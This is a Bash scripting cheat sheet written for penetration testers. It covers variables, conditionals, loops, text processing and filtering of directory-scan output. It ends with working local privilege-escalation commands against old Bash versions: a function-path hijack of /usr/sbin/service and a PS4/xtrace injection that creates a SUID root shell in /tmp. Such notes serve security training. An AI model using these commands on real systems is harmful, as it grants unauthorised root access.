Skip to content

Bash

alias

alias ..='cd ..'
alias ll='ls -la'

shebang #!

#! /bin/bash

make script executable

chmod +x hack.sh

execute file

./hack.sh

variables

TARGET=10.10.99.99
echo $TARGET

Arguments

#!/bin/bash
echo "Arg-1 $1 arg-2 $2"
Key Value
$0 The name of the Bash script
$1 - $9 The first 9 arguments to the Bash script
$# Number of arguments passed to the Bash script
$@ All arguments passed to the Bash script
$? The exit status of the most recently run process
$$ The process ID of the current script
$USER The username of the user running the script
$HOSTNAME The hostname of the machine
$RANDOM A random number
$LINENO The current line number in the script

Assign arguments

#!/bin/bash
echo "What is your anme ?"; 
read name;
echo "Your name is $name";

Assign output

#!/bin/bash
user=$(whoami)
echo $user kali

If / Else / Elif

If (string)

#!/bin/bash
echo "Select scan XSS/SQLi";

read -p "Attack name:" action

if [ $action == 'XSS' ]; then
 echo "XSS attack..."; 
fi

If (number)

#!/bin/bash
echo "Number of request";

read -p "Nr:" action

if [ $action -lt 10  ]; then
 echo "< 10";
fi

if [ $action -eq 10 ]; then
 echo "== 10"; 
fi

if [ $action -gt 10  ]; then
 echo "> 10";
fi

If-Else

#!/bin/bash
echo "Number of request";
read -p "Nr:" action
if [ $action -eq 10  ]; then
 echo "OK";
else
 echo "No OK"
fi

If-ElseIf-Else

#!/bin/bash
echo "Number of request";
read -p "Nr:" action

if [ $action -eq 10  ]; then
 echo "OK.1";
elif [ $action -eq 20 ]; then
 echo "OK.2";
else    
 echo "No OK"
fi

Logical Operations

grep 'kali' /etc/passwd && echo "User exist"
grep 'john' /etc/passwd || echo "User NOT exist"
[ $(whoami) == 'kali' ] && echo "Not root user"
[ $(whoami) == 'root' ] && echo "Root user"
[ $(whoami) != 'root' ] || echo "Ah NOT ROOT"

For

#!/bin/bash
for ip in $(seq 1 10); do 
  echo 10.11.1.$ip;
done
#!/bin/bash
for ip in {1..10}; do 
        echo 10.11.1.$ip; 
done

While

#!/bin/bash
index=1
while [ $index -le 5 ]
do
  echo "10.10.10$index"
  index=$(( $index + 1 ))
done

Function

#!/bin/bash
banner(){
  echo "Super HaCkEr Engine";
}

banner;
banner;

sed

echo "I am Mr.Cat" | sed 's/Cat/Robot/'

cut

echo "root,lorem,password123,ipsum,/root" | cut -d"," -f1,3,5
# root,password123,/root

awk

cat /etc/passwd | awk -F: '{printf "USER--> %s\t HOME--> %s\n", $1, $6}'

piping

cat /etc/passwd | grep '/bin/false' | cut -d":" -f 1,6  | awk -F: '{printf "user: %s home:%s\n", $1, $2}'
cat /etc/passwd | grep '/bin/false' | awk -F: '{printf "user: %s home:%s\n", $1, $6}'

compare

diff
vimdiff
comm

download

wget
curl
axel

filter out some stuff

cat feroxbuster_80.txt | grep -v -E '.js|.css|.gif|.svg|.png|.jpg|.ttf|.eot|.woff|.md'

split by space, take 6 one , sort, unit, filter

cat feroxbuster_80.txt | awk '{print $6}' | sort | uniq | grep -v -E '.js|.css|.gif|.svg|.png|.jpg|.ttf|.eot|.woff|.md'

wipe all whitespace including newlines from file

cat file.txt | tr -d " \t\n\r" 

Bash bugs

Bug in bash < 4.2-048

In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

/bin/bash --version
function /usr/sbin/service { /bin/bash -p; }
export -f /usr/sbin/service

if any binary is using for example /usr/sbin/service apache2 start then with our function we can execute our code

Bash versions < 4.4

When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2

Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

/tmp/rootbash -p